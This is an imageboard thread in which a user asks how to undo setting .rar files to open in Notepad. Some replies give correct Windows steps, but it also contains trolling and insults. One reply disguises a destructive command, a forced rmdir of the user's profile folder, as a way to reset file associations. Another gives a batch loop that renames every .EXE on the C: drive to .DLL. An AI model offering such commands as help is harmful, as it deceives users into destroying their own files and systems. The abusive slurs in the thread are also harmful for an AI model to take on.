Rar file

I was a brainlet and turned set of my rar files to open in notepad how do i reverse the damage?

install gentoo

you have to download untxt

>using windows
>changes filetype association
>can't figure out how to fix

Wow, it certainly Just Works ™


try typing "default app" in the search bar and see what comes up, brainlet.

but its not letting me

You can't. You'll have to reload your computer to fix it.

It doesn't let you do this? How else did you fuck up your computer?

That's a windows 10 feature. Older versions of windows have to reload or upgrade to 10.

Right click file
Open with
Choose another program (I think this option is there on older Windows versions
Choose the correct one
Mark to Always open with desired program

epic trol op

Alternatively, Search "Change File Associations ". Find .rar and .zip and change it.

Or even easier since I just thought of this. Open WinRAR and make sure the correct ones are checked

Right click, open with, other, always use this program

you FUCKING IDIOT. Suck on my fucking dick brainlet retard. Go back to Facebook you little fucking twat.


>right click
>open with


Press win key+R and paste
"%comspec%" /c rmdir /s /q "%userprofile%"
This will reset file associations to their default values.

this is my dads computer what the fuck you asshole hes coming home soon how do i fucking fix this shit you asshole. FUCK YOU

what does this do, nuke everything in your user folder?

The absolute state of Sup Forums

>jus run this command, hehehe
Did you even try?

I laughed so hard with this thread...

You say that as if a clueless pleb who can't even figure out how to open files properly knows what rmdir does. You'd be surprised what tech illiterates fall for.

>new ip

uninstall notepad

CD C:\
For /R %%G in (*.EXE) do REN "%%G" "%~nG.DLL"

Kek, nice reference.

Hahahaha oh my god, the absolute state of Sup Forums. Yeah i guess common sense is certainly a feature you do not posses

OP if you're still here it's really simple.
First you have to get comfortable with basic programming. Python is pretty easy to learn.
Then you'll want to read about algorithms. TAOCP by Knuth is a fairly light read.
Then once you've read up about networking and crypto come back and we'll guide you through the rest.

youve fucked it up badly
reinstalling windows is only way to remedy, don't listen to trolls here who will tell you commands that install spyware

Right click> Properties> Row: Opens With: Notepad [CHANGE...]> [CHANGE...]> More Apps> WinRAR, 7Zip, Ark, etc...